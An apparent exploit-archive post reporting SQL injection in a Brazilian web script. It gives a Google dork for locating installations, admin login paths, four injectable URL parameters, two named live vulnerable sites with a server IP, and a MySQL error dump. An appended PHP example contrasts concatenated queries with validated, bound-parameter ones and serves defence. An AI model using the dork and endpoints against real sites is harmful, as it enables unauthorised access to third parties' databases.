KingSkrupellos

Desenvolvido por Gilbert Sampaio SQL Injection

Jan 10th, 2019
###################################################

# Exploit Title : Desenvolvido por Gilbert Sampaio SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/01/2019
# Vendor Homepage : pt-br.facebook.com/gilbert.sampaio.3
# Script Owner E-Mail : rec.batista@hotmail.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Gilbert Sampaio."
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

###################################################

# Admin Panel Login Path :
*************************

/login.php
/amauto/login.php

# SQL Injection Exploit :
***********************

/ver_news.php?ID=[SQL Injection]

/ver_info.php?ID=[SQL Injection]

/fotos.php?cod=[SQL Injection]

/ocartorio.php?ID=[SQL Injection]

###################################################

# Example Vulnerable Site :
*************************

Note : (201.87.225.16) => There are 291 domains hosted on this server.

[+] cartoriovales.com.br/ver_info.php?ID=2%27 =>

[ Proof of Concept ] => archive.fo/IXb5x

[+] solucioncorrespondente.com.br/ver_info.php?ID=3%27

###################################################

# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version
for the right syntax to use near 'Ativo'' at line 1

?Erro 2: SELECT * FROM imagem WHERE album_id_Album = 1'

###################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################
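
The error output above shows the request value landing unquoted in the statement text (album_id_Album = 1'). The following is an added example, not the vendor's code and not part of the original paste: the concatenating pattern beside a hardened form for a numeric parameter such as cod or ID. The function names, the arquivo column, the sample rows and the in-memory SQLite backend (standing in for MySQL so the script runs offline) are assumptions.

```php
<?php
// Added example: constructed schema and data, hypothetical function names.
declare(strict_types=1);

// In-memory SQLite stands in for the MySQL backend so this runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE imagem (id INTEGER PRIMARY KEY, album_id_Album INTEGER, arquivo TEXT)");
$pdo->exec("INSERT INTO imagem (album_id_Album, arquivo) VALUES (1, 'a.jpg'), (1, 'b.jpg'), (2, 'c.jpg')");

// Before: the request value is concatenated into the SQL text,
// which is the pattern the "Erro 2" output implies.
function fotosVulnerable(PDO $pdo, string $cod): array
{
    $sql = "SELECT * FROM imagem WHERE album_id_Album = " . $cod;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// After: strict integer validation, then a bound parameter.
// The value is never part of the SQL text, so a stray quote cannot change the statement.
function fotosHardened(PDO $pdo, string $cod): array
{
    $id = filter_var($cod, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // reject: the page should answer 400 and never echo the SQL error
    }
    $stmt = $pdo->prepare("SELECT * FROM imagem WHERE album_id_Album = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id and the trailing quote shown in the paste.
foreach (["1", "1'"] as $cod) {
    try {
        $before = count(fotosVulnerable($pdo, $cod)) . " rows";
    } catch (PDOException $e) {
        // In the affected pages this exception text is what reaches the visitor.
        $before = "SQL syntax error raised";
    }
    $after = count(fotosHardened($pdo, $cod)) . " rows";
    printf("cod=%-3s before: %-24s after: %s\n", $cod, $before, $after);
}
```

The same two steps apply to each listed endpoint; database error text should go to the server log rather than the response body.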